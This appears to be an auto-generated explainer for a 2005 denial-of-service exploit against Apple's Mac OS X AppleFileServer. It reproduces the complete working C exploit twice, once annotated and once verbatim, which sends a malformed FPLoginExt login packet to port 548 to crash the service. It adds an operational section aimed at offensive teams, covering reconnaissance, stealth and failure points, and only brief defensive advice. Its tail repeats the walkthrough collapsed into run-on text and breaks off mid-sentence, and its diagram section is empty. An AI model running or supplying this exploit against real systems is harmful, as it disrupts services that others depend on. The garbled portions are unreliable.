Apple Mac OSX AppleFileServer Remote Denial of Service Exploit Explained

What this paper is

This paper details a vulnerability in Apple's AppleFileServer (AFP) service on Mac OSX. The vulnerability allows an attacker to cause a Denial of Service (DoS) by sending a specially crafted packet. This exploit targets the FPLoginExt command, which is used to establish a session with the server. By providing malformed data within this command, the server can be made to crash.

Simple technical breakdown

The exploit works by sending a malformed login request to the AppleFileServer. The server expects certain data structures and sizes when processing this request. The exploit crafts a packet that violates these expectations, specifically by providing oversized or malformed data in fields like UAM (User Authentication Method). This causes an internal error or buffer overflow condition within the server's handling of the FPLoginExt command, leading to a crash and thus a Denial of Service.

Complete code and payload walkthrough

The provided C code implements a client that connects to an AppleFileServer and sends a malicious packet. Let's break down the code and its components.

/* [ fm-afp.c ]
* -( nemo @ felinemenace.org )- 2005
*
* Code for afp bug found by Braden Thomas.
*
* Again hello to everyone @ irc.pulltheplug.org
*
* need a challenge? -( http://pulltheplug.org )-
*/

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/time.h>

// Define constants for buffer sizes and the AFP port
#define UAMSIZE    1022
#define AFPVERSIZE 5
#define PATHSIZE   30
#define UASIZE     30
#define AFPNSIZE   5
#define AFPPORT    548
#define BUFSIZE sizeof(dsi)+sizeof(fploginext) //+LEN+sizeof(afpEnd)

// Define data structures that mirror the AFP protocol's packet format
typedef struct { char AFPVER[AFPVERSIZE]  ;} AFPVER_T;
typedef struct { char UAM[UAMSIZE]        ;} UAM_T;
typedef struct { char PATH[PATHSIZE]      ;} PATH_T;
typedef struct { char UserAuthInfo[UASIZE];} UserAuth_t;
typedef struct { char AFPName[AFPNSIZE]   ;} AFPName_t;

// DSI (Data Stream Interface) header structure
typedef struct dsi { // Data Stream Interface.
       u_int8_t  req;
       u_int8_t  com;
       u_int16_t id;
       u_int32_t offset;
       u_int32_t len;
       u_int32_t reserved;
} DSI_T;

// FPLoginExt (File Protocol Login Extended) structure
typedef struct FPLoginExt { // Establishes a session with a server using an Open Directory domain.
       u_int8_t   command;
       u_int8_t   pad;
       u_int16_t  flags;
       AFPVER_T   AFPVER;
       UAM_T      UAM;
       u_int8_t   UserNameType;
       AFPName_t  UserName;
       u_int8_t   PathType;
       PATH_T     Pathname;
       u_int8_t   pad2;
       UserAuth_t UserAuthInfo;
} FP_LoginExt_T;

// Global instances of the DSI and FPLoginExt structures
DSI_T dsi;
FP_LoginExt_T fploginext;

// Function to display the banner and author information
void banner()
{
       printf(" [ fm-afp.c ]\n");
       printf("-( nemo@felinemenace.org )-\n\n");
}

// Function to display usage instructions and exit
void usage(char *progname)
{
       printf("usage: %s <ip address>.\n",progname);
       exit(1);
}

// Function to establish a TCP connection to the target AFP server
int connect_afp(char *ip,int *sockfd)
{
       struct sockaddr_in target_addr;
       int len;

       // Create a TCP socket
       *sockfd = socket(AF_INET, SOCK_STREAM, 0);

       // Configure the target address structure
       target_addr.sin_family = AF_INET;
       target_addr.sin_port = htons(AFPPORT); // AFP default port is 548
       inet_aton(ip, &(target_addr.sin_addr)); // Convert IP string to network byte order
       memset(&(target_addr.sin_zero), '\0', 8); // Zero out the rest of the structure

       // Attempt to connect to the target
       if (connect(*sockfd, (struct sockaddr *)&target_addr, sizeof(struct sockaddr)) == -1) {
               return 1; // Return 1 on connection failure
       }
       return 0; // Return 0 on successful connection
}

// Function to generate the malicious AFP packet
void generate_packet(char *packet)
{
       int n;

       // Populate the DSI header
       dsi.req       = '\x00'; // Request type (unknown significance for DoS)
       dsi.com       = '\x02'; // Command code (likely related to session setup)
       dsi.id        = (u_int16_t)0x0002; // Transaction ID
       dsi.offset    = 0x00000000; // Offset for data (not used here)
       dsi.len       = 0x00000434; // Length of the payload (this is a large value)
       dsi.reserved  = 0x00000000; // Reserved field

       // Populate the FPLoginExt structure
       fploginext.command = (u_int8_t)'\x3f'; // Command for FPLoginExt
       fploginext.pad     = (u_int8_t)'\x00'; // Padding
       fploginext.flags   = (u_int16_t)0x0000; // Flags
       memcpy((char *)&(fploginext.AFPVER),"\x04\x6e\x65\x6d\x6f",5); // AFP Version, contains "nemo"
       memset((char*)((&fploginext.UAM)),'\x70',sizeof(fploginext.UAM)); // Fill UAM with 'p'
       fploginext.UAM.UAM[0] = '\x0f'; // Set first byte of UAM
       fploginext.UAM.UAM[1] = '\xff'; // Set second byte of UAM
       fploginext.UAM.UAM[257] = '\xff'; // Set byte at offset 257 in UAM
       fploginext.UAM.UAM[258] = '\xff'; // Set byte at offset 258 in UAM
       fploginext.UAM.UAM[500] = '\x00'; // Set byte at offset 500 in UAM
       fploginext.UAM.UAM[501] = '\xf0'; // Set byte at offset 501 in UAM
       // The UAM field is intentionally filled with a large amount of data and specific bytes
       // to trigger a vulnerability. The size of UAM is defined as UAMSIZE (1022 bytes).
       // The values like 0x0f, 0xff, 0x00, 0xf0 are likely chosen to manipulate parsing logic or
       // cause an out-of-bounds read/write when the server processes this data.

       fploginext.UserNameType = (u_int8_t)'\x11'; // User name type
       memcpy((char *)&(fploginext.UserName),"\x54\x6e\x65\x6d\x6f",5); // User name, contains "Tnem o"
       fploginext.PathType = (u_int8_t)'\xff'; // Path type
       memcpy((char *)&(fploginext.Pathname),"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",30); // Pathname, filled with 'A's
       fploginext.pad2 = (u_int8_t)'\xff'; // Padding
       memcpy((char *)&(fploginext.UserAuthInfo),"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBB",30); // User authentication info, filled with 'B's

       // Copy the DSI header and FPLoginExt structure into the packet buffer
       memcpy(packet, &dsi, sizeof(dsi));
       packet += sizeof(dsi); // Advance the packet pointer
       memcpy(packet, &fploginext, sizeof(fploginext)); // Copy the login extension data
}

// Function to send the crafted packet over the socket
int send_packet(char *packet,int *sockfd)
{
       // Send the packet. BUFSIZE is calculated to be exactly the size of dsi + fploginext.
       if (send(*sockfd, packet, BUFSIZE, 0) == -1) {
               return 1; // Return 1 on send failure
       }

       return 0; // Return 0 on successful send
}

// Main function: entry point of the program
int main(int ac, char **av)
{
       int sockfd;
       char packet[BUFSIZE]; // Buffer to hold the packet
       struct timeval time; // Structure for select timeout

       banner(); // Display banner
       if(ac != 2) { // Check for correct number of command-line arguments
               usage(*av); // Display usage if incorrect
       }
       printf("[+] Connecting to target: %s.\n",av[1]);
       if(connect_afp(av[1],&sockfd)) { // Attempt to connect to the target IP
               printf("[-] An error has occured connecting to the target.\n");
               exit(1); // Exit if connection fails
       }

       printf("[+] Generating malicious packet.\n");
       generate_packet(packet); // Generate the exploit packet

       printf("[+] Sending packet to target.\n");
       if(send_packet(packet,&sockfd)) { // Send the generated packet
               printf("[-] Error sending packet.\n");
               close(sockfd); // Close the socket
               exit(1); // Exit if send fails
       }

       // Use select with a very short timeout to check if the server responds or
       // if the connection is still open. This is not strictly necessary for the DoS
       // but might be used to check if the server is still alive after the packet.
       fd_set mySet;
       FD_ZERO(&mySet);
       FD_SET(sockfd, &mySet);
       time.tv_sec = 0;
       time.tv_usec = 50; // 50 microseconds timeout
       select(sockfd+1, &mySet, NULL, NULL, &time);

       close(sockfd); // Close the socket
       return 0; // Exit successfully
}

// milw0rm.com [2005-02-08]
-----

### Code Fragment/Block -> Practical Purpose Mapping:

*   `#include <sys/types.h>, #include <sys/socket.h>, ...`: **Standard library includes.** Provides necessary functions for network programming (sockets, IP addresses, time).
*   `#define UAMSIZE 1022, #define AFPPORT 548, ...`: **Constants definition.** Defines fixed values like the size of the User Authentication Method buffer, the standard AFP port (548), and the total packet size.
*   `typedef struct { char AFPVER[AFPVERSIZE] ;} AFPVER_T; ...`: **Structure definitions.** Defines data structures that mirror the expected format of AFP protocol messages. These are crucial for correctly constructing the packet.
*   `typedef struct dsi { ... } DSI_T;`: **DSI Header Structure.** Represents the Data Stream Interface header, which is a common header for AFP communication. It contains fields like request type, command, ID, offset, and length.
*   `typedef struct FPLoginExt { ... } FP_LoginExt_T;`: **FPLoginExt Structure.** Represents the extended login request structure. This is the primary structure manipulated by the exploit. It contains fields for AFP version, UAM, username, path, and authentication info.
*   `DSI_T dsi; FP_LoginExt_T fploginext;`: **Global structure instances.** Declares global variables to hold the DSI and FPLoginExt data that will be populated and sent.
*   `void banner()`: **Display banner.** Prints the exploit's name and author.
*   `void usage(char *progname)`: **Display usage.** Informs the user how to run the exploit if incorrect arguments are provided.
*   `int connect_afp(char *ip,int *sockfd)`: **Establish connection.** Creates a TCP socket, configures it to connect to the target IP address on port 548, and attempts the connection. Returns 0 on success, 1 on failure.
*   `void generate_packet(char *packet)`: **Craft malicious packet.** This is the core of the exploit's payload generation.
    *   `dsi.req = '\x00'; dsi.com = '\x02'; dsi.id = (u_int16_t)0x0002; dsi.offset = 0x00000000; dsi.len = 0x00000434; dsi.reserved = 0x00000000;`: **Populate DSI header.** Sets the DSI header fields. `dsi.len` is set to `0x00000434` (1076 decimal), which is a large value. This might be intended to influence how the server allocates buffer space or processes the subsequent data.
    *   `fploginext.command = (u_int8_t)'\x3f'; fploginext.pad = (u_int8_t)'\x00'; fploginext.flags = (u_int16_t)0x0000;`: **Populate FPLoginExt header fields.** Sets the command, padding, and flags for the extended login request.
    *   `memcpy((char *)&(fploginext.AFPVER),"\x04\x6e\x65\x6d\x6f",5);`: **Set AFP Version.** Sets the AFP version field with `\x04` followed by "nemo". This is likely just to fill the field.
    *   `memset((char*)((&fploginext.UAM)),'\x70',sizeof(fploginext.UAM));`: **Initialize UAM buffer.** Fills the entire `UAM` buffer (1022 bytes) with the character 'p' (`\x70`). This is a common technique to pre-fill a buffer.
    *   `fploginext.UAM.UAM[0] = '\x0f'; fploginext.UAM.UAM[1] = '\xff'; fploginext.UAM.UAM[257] = '\xff'; fploginext.UAM.UAM[258] = '\xff'; fploginext.UAM.UAM[500] = '\x00'; fploginext.UAM.UAM[501] = '\xf0';`: **Inject specific UAM bytes.** This is the critical part for triggering the vulnerability. Specific bytes are overwritten at offsets 0, 1, 257, 258, 500, and 501 within the `UAM` buffer. These values (`\x0f`, `\xff`, `\x00`, `\xf0`) are likely chosen to confuse the server's parsing logic, potentially leading to an out-of-bounds read or write when it tries to interpret the UAM data as a string or structure. The large size of the `UAM` field itself, combined with these specific bytes, is what causes the crash.
    *   `fploginext.UserNameType = (u_int8_t)'\x11'; memcpy((char *)&(fploginext.UserName),"\x54\x6e\x65\x6d\x6f",5);`: **Set Username.** Sets the username type and a short username "Tnem o".
    *   `fploginext.PathType = (u_int8_t)'\xff'; memcpy((char *)&(fploginext.Pathname),"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",30);`: **Set Pathname.** Sets a path type and fills the `Pathname` field with 30 'A' characters.
    *   `fploginext.pad2 = (u_int8_t)'\xff'; memcpy((char *)&(fploginext.UserAuthInfo),"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBB",30);`: **Set UserAuthInfo.** Sets padding and fills the `UserAuthInfo` field with 30 'B' characters.
    *   `memcpy(packet, &dsi, sizeof(dsi)); packet += sizeof(dsi); memcpy(packet, &fploginext, sizeof(fploginext));`: **Assemble packet.** Copies the populated DSI header and FPLoginExt structure into the provided `packet` buffer.
*   `int send_packet(char *packet,int *sockfd)`: **Send packet.** Transmits the crafted packet over the established TCP socket.
*   `int main(int ac, char **av)`: **Main execution flow.**
    *   `banner();`: Calls the banner function.
    *   `if(ac != 2) { usage(*av); }`: Checks for exactly one command-line argument (the IP address).
    *   `connect_afp(av[1],&sockfd)`: Attempts to connect to the target IP.
    *   `generate_packet(packet);`: Calls the function to create the malicious packet.
    *   `send_packet(packet,&sockfd);`: Sends the packet.
    *   `fd_set mySet; ... select(sockfd+1, &mySet, NULL, NULL, &time);`: A `select` call with a very short timeout (50 microseconds). This is likely included to check if the server is still responsive or if the connection is still valid after sending the packet. It doesn't actively do anything to cause the DoS but observes the state.
    *   `close(sockfd);`: Closes the network connection.

### Shellcode/Payload Segments:

This exploit does not contain traditional shellcode. Instead, the "payload" is the entire crafted packet sent to the server. The vulnerability lies in how the server processes the `FPLoginExt` structure, specifically the `UAM` field.

*   **Stage 1: DSI Header (`dsi`)**: This is the initial header that frames the AFP request. It indicates the type of request and its length.
*   **Stage 2: FPLoginExt Structure (`fploginext`)**: This structure contains the actual data that triggers the vulnerability.
    *   **`AFPVER`**: A version string, likely for identification.
    *   **`UAM`**: The User Authentication Method field. This is the primary target of the exploit. It's initialized with 'p' characters and then specific bytes (`\x0f`, `\xff`, `\x00`, `\xf0`) are injected at particular offsets. The large size (`UAMSIZE = 1022`) and these specific bytes are designed to cause the server to misinterpret data, leading to a crash. The exact mechanism of the crash (e.g., buffer overflow, null pointer dereference) is not explicitly detailed in the code but is implied by the DoS outcome.
    *   **`UserNameType`, `UserName`, `PathType`, `Pathname`, `pad2`, `UserAuthInfo`**: These fields are also populated with arbitrary data. While their specific content might not be the direct cause of the crash, they are part of the overall `FPLoginExt` structure that the server attempts to parse.

## Practical details for offensive operations teams

*   **Required Access Level**: Network access to the target system is required. No prior authentication or local access is needed.
*   **Lab Preconditions**:
    *   A target Mac OSX system running an AppleFileServer service (typically enabled by default or easily enabled).
    *   The target system must be reachable over the network.
    *   A Linux or macOS machine to run the exploit code.
    *   The exploit code compiled into an executable.
*   **Tooling Assumptions**:
    *   A C compiler (like GCC) to compile the exploit code.
    *   Standard networking utilities.
    *   The exploit code itself.
*   **Execution Pitfalls**:
    *   **Network Connectivity**: Firewalls blocking port 548 (AFP) will prevent the exploit from reaching the target.
    *   **Service Not Running**: If AppleFileServer is not running or is configured to use a different port, the exploit will fail.
    *   **Patched Versions**: Modern macOS versions have likely patched this specific vulnerability. The exploit is effective against older, unpatched systems.
    *   **Incorrect IP Address**: Providing an invalid or unreachable IP address will result in connection errors.
    *   **Packet Corruption**: While unlikely with this simple C code, any manual modification of the packet bytes could lead to unexpected behavior or failure.
*   **Planning Assumptions**:
    *   The target environment is running a vulnerable version of Mac OSX with AppleFileServer enabled.
    *   The attacker has network visibility and can send TCP packets to port 548 on the target.
    *   The objective is to disrupt service availability, not gain code execution.
*   **Tradecraft Considerations**:
    *   **Reconnaissance**: Confirm the target is running macOS and that the AFP service is active before attempting exploitation. Tools like `nmap` with appropriate scripts can help identify AFP services.
    *   **Stealth**: While this is a DoS exploit and not designed for stealth, sending a single packet is generally less noisy than persistent scanning. However, network intrusion detection systems (NIDS) might flag unusual traffic to port 548.
    *   **Impact Assessment**: Understand that this exploit will likely crash the AFP service, making file sharing unavailable. This could have significant operational impact.
*   **Likely Failure Points**:
    *   The target system is not vulnerable (patched).
    *   Network segmentation or firewall rules preventing access to port 548.
    *   The AFP service is not running on the target.
    *   The server's internal handling of malformed packets has changed in a way that prevents a crash (e.g., graceful error handling).

## Where this was used and when

This exploit was published in **February 2005**. Exploits from this era were often used in security research, proof-of-concept demonstrations, and potentially by malicious actors targeting older, unpatched systems. The vulnerability was found by Braden Thomas and published by "nemo" on milw0rm.com. It's highly probable that systems running Mac OSX versions from around 2005 or earlier would be susceptible.

## Defensive lessons for modern teams

*   **Patch Management**: Regularly update operating systems and services to patch known vulnerabilities. This is the most effective defense against exploits like this.
*   **Network Segmentation & Firewalls**: Restrict access to non-essential services like AFP from untrusted networks. Implement firewalls to block inbound connections to port 548 unless explicitly required.
*   **Service Hardening**: Disable or restrict services that are not actively used. If AFP is not needed, disable it.
*   **Intrusion Detection/Prevention Systems (IDS/IPS)**: Configure IDS/IPS to monitor for unusual traffic patterns on common service ports, including AFP. While this specific exploit might be simple, signature-based or anomaly-based detection can help identify such attacks.
*   **Logging and Monitoring**: Ensure that system and service logs are enabled and regularly reviewed. A crash of the AFP service should be logged, which can help in post-incident analysis.
*   **Vulnerability Scanning**: Regularly scan your network for known vulnerabilities, including those affecting older operating systems and services.

## ASCII visual (if applicable)

This exploit is a simple client-server interaction where the client sends a single malformed packet. A visual representation of the packet structure might be more illustrative than a system architecture diagram.


**Packet Structure (Simplified):**


## Source references

*   **Paper URL**: [https://www.exploit-db.com/papers/799](https://www.exploit-db.com/papers/799)
*   **Raw Exploit URL**: [https://www.exploit-db.com/raw/799](https://www.exploit-db.com/raw/799)
*   **Author**: nemo
*   **Published**: 2005-02-08
*   **Keywords**: OSX, dos

---

## Original Exploit-DB Content (Verbatim)

```text
/* [ fm-afp.c ]
* -( nemo @ felinemenace.org )- 2005
*
* Code for afp bug found by Braden Thomas.
*
* Again hello to everyone @ irc.pulltheplug.org
*
* need a challenge? -( http://pulltheplug.org )-
*/

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/time.h>

#define UAMSIZE    1022
#define AFPVERSIZE 5
#define PATHSIZE   30
#define UASIZE     30
#define AFPNSIZE   5
#define AFPPORT    548
#define BUFSIZE sizeof(dsi)+sizeof(fploginext) //+LEN+sizeof(afpEnd)

typedef struct { char AFPVER[AFPVERSIZE]  ;} AFPVER_T;
typedef struct { char UAM[UAMSIZE]        ;} UAM_T;
typedef struct { char PATH[PATHSIZE]      ;} PATH_T;
typedef struct { char UserAuthInfo[UASIZE];} UserAuth_t;
typedef struct { char AFPName[AFPNSIZE]   ;} AFPName_t;

typedef struct dsi { // Data Stream Interface.
       u_int8_t  req;
       u_int8_t  com;
       u_int16_t id;
       u_int32_t offset;
       u_int32_t len;
       u_int32_t reserved;
} DSI_T;

typedef struct FPLoginExt { // Establishes a session with a server using an Open Directory domain.
       u_int8_t   command;
       u_int8_t   pad;
       u_int16_t  flags;
       AFPVER_T   AFPVER;
       UAM_T      UAM;
       u_int8_t   UserNameType;
       AFPName_t  UserName;
       u_int8_t   PathType;
       PATH_T     Pathname;
       u_int8_t   pad2;
       UserAuth_t UserAuthInfo;
} FP_LoginExt_T;

DSI_T dsi;
FP_LoginExt_T fploginext;

void banner()
{
       printf(" [ fm-afp.c ]\n");
       printf("-( nemo@felinemenace.org )-\n\n");
}

void usage(char *progname)
{
       printf("usage: %s <ip address>.\n",progname);
       exit(1);
}

int connect_afp(char *ip,int *sockfd)
{
       struct sockaddr_in target_addr;
       int len;

       *sockfd = socket(AF_INET, SOCK_STREAM, 0);

       target_addr.sin_family = AF_INET;
       target_addr.sin_port = htons(AFPPORT);
       inet_aton(ip, &(target_addr.sin_addr));
       memset(&(target_addr.sin_zero), '\0', 8);

       if (connect(*sockfd, (struct sockaddr *)&target_addr, sizeof(struct sockaddr)) == -1) {
               return 1;
       }
       return 0;
}

void generate_packet(char *packet)
{
       int n;

       dsi.req       = '\x00';
       dsi.com       = '\x02';
       dsi.id        = (u_int16_t)0x0002;
       dsi.offset    = 0x00000000;
       dsi.len       = 0x00000434;
       dsi.reserved  = 0x00000000;

       fploginext.command = (u_int8_t)'\x3f';
       fploginext.pad     = (u_int8_t)'\x00';
       fploginext.flags   = (u_int16_t)0x0000;
       memcpy((char *)&(fploginext.AFPVER),"\x04\x6e\x65\x6d\x6f",5);
       memset((char*)((&fploginext.UAM)),'\x70',sizeof(fploginext.UAM));
       fploginext.UAM.UAM[0] = '\x0f';
       fploginext.UAM.UAM[1] = '\xff';
       fploginext.UAM.UAM[257] = '\xff';               //      size of next string.
       fploginext.UAM.UAM[258] = '\xff';               //
       fploginext.UAM.UAM[500] = '\x00';               //      size of next string.
       fploginext.UAM.UAM[501] = '\xf0';               //

       fploginext.UserNameType = (u_int8_t)'\x11';
       memcpy((char *)&(fploginext.UserName),"\x54\x6e\x65\x6d\x6f",5);
       fploginext.PathType = (u_int8_t)'\xff';
       memcpy((char *)&(fploginext.Pathname),"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",30);
       fploginext.pad2 = (u_int8_t)'\xff';
       memcpy((char *)&(fploginext.UserAuthInfo),"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBB",30);

       memcpy(packet, &dsi, sizeof(dsi));
       packet += sizeof(dsi);
       memcpy(packet, &fploginext, sizeof(fploginext));
}

int send_packet(char *packet,int *sockfd)
{
       if (send(*sockfd, packet, BUFSIZE, 0) == -1) {
               return 1;
       }

       return 0;
}

int main(int ac, char **av)
{
       int sockfd;
       char packet[BUFSIZE];
       struct timeval time;

       banner();
       if(ac != 2) {
               usage(*av);
       }
       printf("[+] Connecting to target: %s.\n",av[1]);
       if(connect_afp(av[1],&sockfd)) {
               printf("[-] An error has occured connecting to the target.\n");
               exit(1);
       }

       printf("[+] Generating malicious packet.\n");
       generate_packet(packet);

       printf("[+] Sending packet to target.\n");
       if(send_packet(packet,&sockfd)) {
               printf("[-] Error sending packet.\n");
               close(sockfd);
               exit(1);
       }

       fd_set mySet;
       FD_ZERO(&mySet);
       FD_SET(sockfd, &mySet);
       time.tv_sec = 0;
       time.tv_usec = 50;
       select(sockfd+1, &mySet, NULL, NULL, &time);

       close(sockfd);
       return 0;
}

// milw0rm.com [2005-02-08]

What this paper is

Simple technical breakdown

Complete code and payload walkthrough

The provided C code implements a client that connects to an AppleFileServer and sends a malicious packet. Let's break down the code and its components.

/* [ fm-afp.c ] * -( nemo @ felinemenace.org )- 2005 * * Code for afp bug found by Braden Thomas. * * Again hello to everyone @ irc.pulltheplug.org * * need a challenge? -( http://pulltheplug.org )- */ #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <sys/time.h> // Define constants for buffer sizes and the AFP port #define UAMSIZE 1022 #define AFPVERSIZE 5 #define PATHSIZE 30 #define UASIZE 30 #define AFPNSIZE 5 #define AFPPORT 548 #define BUFSIZE sizeof(dsi)+sizeof(fploginext) //+LEN+sizeof(afpEnd) // Define data structures that mirror the AFP protocol's packet format typedef struct { char AFPVER[AFPVERSIZE] ;} AFPVER_T; typedef struct { char UAM[UAMSIZE] ;} UAM_T; typedef struct { char PATH[PATHSIZE] ;} PATH_T; typedef struct { char UserAuthInfo[UASIZE];} UserAuth_t; typedef struct { char AFPName[AFPNSIZE] ;} AFPName_t; // DSI (Data Stream Interface) header structure typedef struct dsi { // Data Stream Interface. u_int8_t req; u_int8_t com; u_int16_t id; u_int32_t offset; u_int32_t len; u_int32_t reserved; } DSI_T; // FPLoginExt (File Protocol Login Extended) structure typedef struct FPLoginExt { // Establishes a session with a server using an Open Directory domain. u_int8_t command; u_int8_t pad; u_int16_t flags; AFPVER_T AFPVER; UAM_T UAM; u_int8_t UserNameType; AFPName_t UserName; u_int8_t PathType; PATH_T Pathname; u_int8_t pad2; UserAuth_t UserAuthInfo; } FP_LoginExt_T; // Global instances of the DSI and FPLoginExt structures DSI_T dsi; FP_LoginExt_T fploginext; // Function to display the banner and author information void banner() { printf(" [ fm-afp.c ]\n"); printf("-( nemo@felinemenace.org )-\n\n"); } // Function to display usage instructions and exit void usage(char *progname) { printf("usage: %s <ip address>.\n",progname); exit(1); } // Function to establish a TCP connection to the target AFP server int connect_afp(char *ip,int *sockfd) { struct sockaddr_in target_addr; int len; // Create a TCP socket *sockfd = socket(AF_INET, SOCK_STREAM, 0); // Configure the target address structure target_addr.sin_family = AF_INET; target_addr.sin_port = htons(AFPPORT); // AFP default port is 548 inet_aton(ip, &(target_addr.sin_addr)); // Convert IP string to network byte order memset(&(target_addr.sin_zero), '\0', 8); // Zero out the rest of the structure // Attempt to connect to the target if (connect(*sockfd, (struct sockaddr *)&target_addr, sizeof(struct sockaddr)) == -1) { return 1; // Return 1 on connection failure } return 0; // Return 0 on successful connection } // Function to generate the malicious AFP packet void generate_packet(char *packet) { int n; // Populate the DSI header dsi.req = '\x00'; // Request type (unknown significance for DoS) dsi.com = '\x02'; // Command code (likely related to session setup) dsi.id = (u_int16_t)0x0002; // Transaction ID dsi.offset = 0x00000000; // Offset for data (not used here) dsi.len = 0x00000434; // Length of the payload (this is a large value) dsi.reserved = 0x00000000; // Reserved field // Populate the FPLoginExt structure fploginext.command = (u_int8_t)'\x3f'; // Command for FPLoginExt fploginext.pad = (u_int8_t)'\x00'; // Padding fploginext.flags = (u_int16_t)0x0000; // Flags memcpy((char *)&(fploginext.AFPVER),"\x04\x6e\x65\x6d\x6f",5); // AFP Version, contains "nemo" memset((char*)((&fploginext.UAM)),'\x70',sizeof(fploginext.UAM)); // Fill UAM with 'p' fploginext.UAM.UAM[0] = '\x0f'; // Set first byte of UAM fploginext.UAM.UAM[1] = '\xff'; // Set second byte of UAM fploginext.UAM.UAM[257] = '\xff'; // Set byte at offset 257 in UAM fploginext.UAM.UAM[258] = '\xff'; // Set byte at offset 258 in UAM fploginext.UAM.UAM[500] = '\x00'; // Set byte at offset 500 in UAM fploginext.UAM.UAM[501] = '\xf0'; // Set byte at offset 501 in UAM // The UAM field is intentionally filled with a large amount of data and specific bytes // to trigger a vulnerability. The size of UAM is defined as UAMSIZE (1022 bytes). // The values like 0x0f, 0xff, 0x00, 0xf0 are likely chosen to manipulate parsing logic or // cause an out-of-bounds read/write when the server processes this data. fploginext.UserNameType = (u_int8_t)'\x11'; // User name type memcpy((char *)&(fploginext.UserName),"\x54\x6e\x65\x6d\x6f",5); // User name, contains "Tnem o" fploginext.PathType = (u_int8_t)'\xff'; // Path type memcpy((char *)&(fploginext.Pathname),"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",30); // Pathname, filled with 'A's fploginext.pad2 = (u_int8_t)'\xff'; // Padding memcpy((char *)&(fploginext.UserAuthInfo),"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBB",30); // User authentication info, filled with 'B's // Copy the DSI header and FPLoginExt structure into the packet buffer memcpy(packet, &dsi, sizeof(dsi)); packet += sizeof(dsi); // Advance the packet pointer memcpy(packet, &fploginext, sizeof(fploginext)); // Copy the login extension data } // Function to send the crafted packet over the socket int send_packet(char *packet,int *sockfd) { // Send the packet. BUFSIZE is calculated to be exactly the size of dsi + fploginext. if (send(*sockfd, packet, BUFSIZE, 0) == -1) { return 1; // Return 1 on send failure } return 0; // Return 0 on successful send } // Main function: entry point of the program int main(int ac, char **av) { int sockfd; char packet[BUFSIZE]; // Buffer to hold the packet struct timeval time; // Structure for select timeout banner(); // Display banner if(ac != 2) { // Check for correct number of command-line arguments usage(*av); // Display usage if incorrect } printf("[+] Connecting to target: %s.\n",av[1]); if(connect_afp(av[1],&sockfd)) { // Attempt to connect to the target IP printf("[-] An error has occured connecting to the target.\n"); exit(1); // Exit if connection fails } printf("[+] Generating malicious packet.\n"); generate_packet(packet); // Generate the exploit packet printf("[+] Sending packet to target.\n"); if(send_packet(packet,&sockfd)) { // Send the generated packet printf("[-] Error sending packet.\n"); close(sockfd); // Close the socket exit(1); // Exit if send fails } // Use select with a very short timeout to check if the server responds or // if the connection is still open. This is not strictly necessary for the DoS // but might be used to check if the server is still alive after the packet. fd_set mySet; FD_ZERO(&mySet); FD_SET(sockfd, &mySet); time.tv_sec = 0; time.tv_usec = 50; // 50 microseconds timeout select(sockfd+1, &mySet, NULL, NULL, &time); close(sockfd); // Close the socket return 0; // Exit successfully } // milw0rm.com [2005-02-08] ----- ### Code Fragment/Block -> Practical Purpose Mapping: * `#include <sys/types.h>, #include <sys/socket.h>, ...`: **Standard library includes.** Provides necessary functions for network programming (sockets, IP addresses, time). * `#define UAMSIZE 1022, #define AFPPORT 548, ...`: **Constants definition.** Defines fixed values like the size of the User Authentication Method buffer, the standard AFP port (548), and the total packet size. * `typedef struct { char AFPVER[AFPVERSIZE] ;} AFPVER_T; ...`: **Structure definitions.** Defines data structures that mirror the expected format of AFP protocol messages. These are crucial for correctly constructing the packet. * `typedef struct dsi { ... } DSI_T;`: **DSI Header Structure.** Represents the Data Stream Interface header, which is a common header for AFP communication. It contains fields like request type, command, ID, offset, and length. * `typedef struct FPLoginExt { ... } FP_LoginExt_T;`: **FPLoginExt Structure.** Represents the extended login request structure. This is the primary structure manipulated by the exploit. It contains fields for AFP version, UAM, username, path, and authentication info. * `DSI_T dsi; FP_LoginExt_T fploginext;`: **Global structure instances.** Declares global variables to hold the DSI and FPLoginExt data that will be populated and sent. * `void banner()`: **Display banner.** Prints the exploit's name and author. * `void usage(char *progname)`: **Display usage.** Informs the user how to run the exploit if incorrect arguments are provided. * `int connect_afp(char *ip,int *sockfd)`: **Establish connection.** Creates a TCP socket, configures it to connect to the target IP address on port 548, and attempts the connection. Returns 0 on success, 1 on failure. * `void generate_packet(char *packet)`: **Craft malicious packet.** This is the core of the exploit's payload generation. * `dsi.req = '\x00'; dsi.com = '\x02'; dsi.id = (u_int16_t)0x0002; dsi.offset = 0x00000000; dsi.len = 0x00000434; dsi.reserved = 0x00000000;`: **Populate DSI header.** Sets the DSI header fields. `dsi.len` is set to `0x00000434` (1076 decimal), which is a large value. This might be intended to influence how the server allocates buffer space or processes the subsequent data. * `fploginext.command = (u_int8_t)'\x3f'; fploginext.pad = (u_int8_t)'\x00'; fploginext.flags = (u_int16_t)0x0000;`: **Populate FPLoginExt header fields.** Sets the command, padding, and flags for the extended login request. * `memcpy((char *)&(fploginext.AFPVER),"\x04\x6e\x65\x6d\x6f",5);`: **Set AFP Version.** Sets the AFP version field with `\x04` followed by "nemo". This is likely just to fill the field. * `memset((char*)((&fploginext.UAM)),'\x70',sizeof(fploginext.UAM));`: **Initialize UAM buffer.** Fills the entire `UAM` buffer (1022 bytes) with the character 'p' (`\x70`). This is a common technique to pre-fill a buffer. * `fploginext.UAM.UAM[0] = '\x0f'; fploginext.UAM.UAM[1] = '\xff'; fploginext.UAM.UAM[257] = '\xff'; fploginext.UAM.UAM[258] = '\xff'; fploginext.UAM.UAM[500] = '\x00'; fploginext.UAM.UAM[501] = '\xf0';`: **Inject specific UAM bytes.** This is the critical part for triggering the vulnerability. Specific bytes are overwritten at offsets 0, 1, 257, 258, 500, and 501 within the `UAM` buffer. These values (`\x0f`, `\xff`, `\x00`, `\xf0`) are likely chosen to confuse the server's parsing logic, potentially leading to an out-of-bounds read or write when it tries to interpret the UAM data as 